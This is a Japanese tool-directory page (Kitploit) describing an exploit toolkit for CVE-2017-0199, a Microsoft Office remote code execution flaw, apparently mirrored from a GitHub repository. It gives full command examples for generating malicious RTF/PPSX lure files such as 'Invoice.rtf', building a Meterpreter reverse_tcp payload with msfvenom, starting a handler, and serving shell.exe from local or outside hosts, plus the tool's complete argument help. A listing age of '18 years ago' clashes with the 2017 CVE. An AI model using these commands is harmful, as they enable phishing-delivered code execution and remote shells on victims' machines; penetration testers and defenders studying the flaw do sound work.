Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2017-0199 | Kitploit
ツール/GitHubGitHub/phantomlancer123/cve-2017-0199
ペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubphantomlancer123/cve-2017-0199

CVE-2017-0199

リポジトリを見る
18年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

エクスプロイトツールキット CVE-2017-0199 - v4.0

エクスプロイトツールキット CVE-2017-0199 - v4.0 は、ペネトレーションテスターやセキュリティ研究者が Microsoft Office RCE を迅速かつ効果的にテストできる便利な Python スクリプトです。複雑な設定を必要とせず、悪意のある RTF/PPSX ファイルを生成し、Metasploit / Meterpreter / その他のペイロードを被害者に配信できます。

免責事項

このプログラムは教育目的専用です。許可なく使用しないでください。通常の免責事項が適用されます。特に、(bhdresh) である私は、これらのプログラムが提供する情報または機能の直接的または間接的な使用によって引き起こされた損害について一切責任を負いません。著者またはいかなるインターネットプロバイダーも、これらのプログラムまたはその派生物の内容または誤用について一切責任を負いません。このプログラムを使用することにより、これらのプログラムの使用によって引き起こされた損害 (データ損失、システムクラッシュ、システム侵害など) が bhdresh の責任ではないことを理解したものとみなされます。

最後に、これは個人による開発です。その理念を尊重し、悪いことに使用しないでください。

ライセンス

CC BY 4.0 ライセンス - https://creativecommons.org/licenses/by/4.0/

リリースノート:

スクリプトに以下の機能が導入されました

root@kitploit:~
- Generate Malicious PPSX file
- Exploitation mode for generated PPSX file
- Updated template.ppsx

バージョン: Python 2.7.13

シナリオ 1: ローカルペイロードの配信

コマンド例
root@kitploit:~
1) Generate malicious RTF file
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Start toolkit in exploit mode to deliver local payload
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
シーケンス図

alt tag

シナリオ 2: リモートペイロードの配信

コマンド例
root@kitploit:~
1) Generate malicious RTF file
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) Start toolkit in exploit mode to deliver remote payload
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe
シーケンス図

alt tag

シナリオ 3: カスタム HTA ファイルの配信

コマンド例
root@kitploit:~
1) Generate malicious RTF file
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Start toolkit in exploit mode to deliver custom HTA file
   # python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta
シーケンス図

alt tag

コマンドライン引数:

root@kitploit:~
# python cve-2017-0199_toolkit.py -h

This is a handy toolkit to exploit CVE-2017-0199 (Microsoft office RCE)

Modes:

-M gen                                          Generate Malicious file only

     Generate malicious RTF/PPSX file:

      -w <Filename.rtf/Filename.ppsx>     Name of malicious RTF/PPSX file (Share this file with victim).

      -u <http://attacker.com/test.hta>   The path to an HTA/SCT file. Normally, this should be a domain or IP where        this                                          tool is running.
                                      For example, http://attackerip.com/test.doc (This URL will be included in 	                                              malicious RTF/PPSX file and will be requested once victim will open malicious RTF file.
      -t RTF|PPSX (default = RTF)         Type of the file to be generated.
      -x 0|1  (default = 0)               Generate obfuscated RTF file. 0 = Disable, 1 = Enable.

				      
-M exp                                          Start exploitation mode

     Exploitation:
 
      -t RTF|PPSX (default = RTF)         Type of file to be exolited.
      -H </tmp/custom>                Local path of a custom HTA/SCT file which needs to be delivered and executed on target.
                                          NOTE: This option will not deliver payloads specified through options "-e" and "-l"
					  
      -p <TCP port:Default 80>            Local port number.

      -e <http://attacker.com/shell.exe>  The path of an executable file / meterpreter shell / payload  which needs to be executed on target.

      -l </tmp/shell.exe>                 If payload is hosted locally, specify local path of an executable file / meterpreter shell / payload.

クレジット

@nixawk (RTF サンプル提供)、@Li Haifei、@bhdresh

バグ、問題、機能リクエスト

明らかに、私はフルタイムの開発者ではないため、いくつかの問題が発生する可能性があります。

バグや問題は https://github.com/bhdresh/CVE-2017-0199/issues/new から報告してください。

ツールをダウンロード